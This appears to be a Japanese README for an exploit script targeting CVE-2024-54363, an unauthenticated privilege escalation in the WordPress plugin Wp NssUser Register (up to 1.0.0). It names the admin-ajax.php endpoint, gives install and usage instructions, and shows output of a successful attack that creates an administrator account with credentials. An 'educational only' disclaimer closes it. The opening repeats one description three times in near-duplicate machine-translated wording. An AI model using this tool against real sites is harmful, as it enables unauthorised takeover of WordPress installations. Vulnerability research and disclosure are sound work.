
nssTheme Wp NssUser Registerにおける不適切な権限割り当ての脆弱性により、権限昇格が可能になります。この問題はWp NssUser Registerに影響します:n/a から 1.0.0 まで。
nssTheme Wp NssUser Register における不適切な権限割り当ての脆弱性により、権限昇格が可能になります。この問題は、Wp NssUser Register の n/a から 1.0.0 までのバージョンに影響します。
WordPress 用プラグイン nssTheme Wp NssUser Register は、不適切な権限割り当て の問題に対して脆弱であり、権限昇格 を引き起こします。この脆弱性により、攻撃者は適切な認証なしに管理者権限を持つ新しいユーザーを登録できます。この問題は、バージョン 1.0.0 までのプラグインに影響します。
Wp NssUser Register1.0.0 まで/wp-admin/admin-ajax.php エンドポイントへのアクセス。pip install -r requirements.txt
usage: CVE-2024-54363.py [-h] -u URL
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
The site http://target-wordpress-site.com is vulnerable. Exploitation in progress...
Exploitation successful!
Username: nxploit123
Password: nxploit
このスクリプトは教育目的でのみ提供されています。作者は、このスクリプトの誤用によって生じたいかなる損害についても責任を負いません。